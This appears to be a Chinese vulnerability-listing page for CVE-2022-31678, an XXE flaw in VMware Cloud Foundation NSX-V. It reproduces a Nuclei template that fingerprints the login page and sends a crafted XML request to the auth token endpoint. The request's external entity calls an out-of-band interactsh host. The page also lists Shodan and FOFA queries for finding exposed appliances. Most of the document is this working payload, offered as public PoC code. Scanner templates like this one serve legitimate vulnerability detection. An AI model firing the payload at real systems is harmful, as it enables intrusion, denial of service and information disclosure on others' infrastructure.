CVE-2022-31678: VMWare Cloud Foundation NSX-V - XML External Entity (XXE)

日期: 2026-02-04 | 影响软件: 未知 | POC: 已公开

漏洞描述

VMware Cloud Foundation (NSX-V) contains an XML External Entity (XXE) vulnerability. On VCF 3.x instances with NSX-V deployed, this may allow a user to exploit this issue leading to a denial-of-service condition or unintended information disclosure.

PoC代码[已公开]

id: CVE-2022-31678

info:
  name: VMWare Cloud Foundation NSX-V - XML External Entity (XXE)
  author: daffainfo
  severity: critical
  description: |
    VMware Cloud Foundation (NSX-V) contains an XML External Entity (XXE) vulnerability. On VCF 3.x instances with NSX-V deployed, this may allow a user to exploit this issue leading to a denial-of-service condition or unintended information disclosure.
  impact: |
    Attackers can cause denial-of-service or access sensitive information by exploiting XXE vulnerability.
  remediation: |
    Update to the latest version of VMware Cloud Foundation with patched NSX-V component.
  reference:
    - https://srcincite.io/advisories/src-2022-0022/
    - https://www.vmware.com/security/advisories/VMSA-2022-0027.html
    - https://nvd.nist.gov/vuln/detail/cve-2022-31678
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2022-31678
    cwe-id: CWE-611
    epss-score: 0.0314
    epss-percentile: 0.86486
    cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: vmware
    product: cloud_foundation
    shodan-query: title:"VMware Appliance Management"
    fofa-query: title="VMware Appliance Management"
  tags: cve,cve2022,vmware,nsx,xxe,vkev,kev

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/login.jsp"

    matchers:
      - type: word
        part: body
        words:
          - "<title>VMware Appliance Management"
        internal: true

  - raw:
      - |
        POST /api/3.0/services/auth/token HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0"?>
        <!DOCTYPE r [
          <!ENTITY xxe SYSTEM "http://{{interactsh-url}}">
        ]>
        <request>
          <username>&xxe;</username>
          <password>{{randstr}}</password>
        </request>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"

      - type: word
        part: body
        words:
          - "Bad Username or Credentials presented"

      - type: status
        status:
          - 403
# digest: 4a0a004730450220462f619364ad10b3b77d1ca5029ba3eb5cd03a71c2d76067bafcc8cdcc6fb81b022100d6de0207504f9f0fcb2fcf37583adb8406adf4bbdb6cfe5fbbd06d9e10de76c8:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-31678.yaml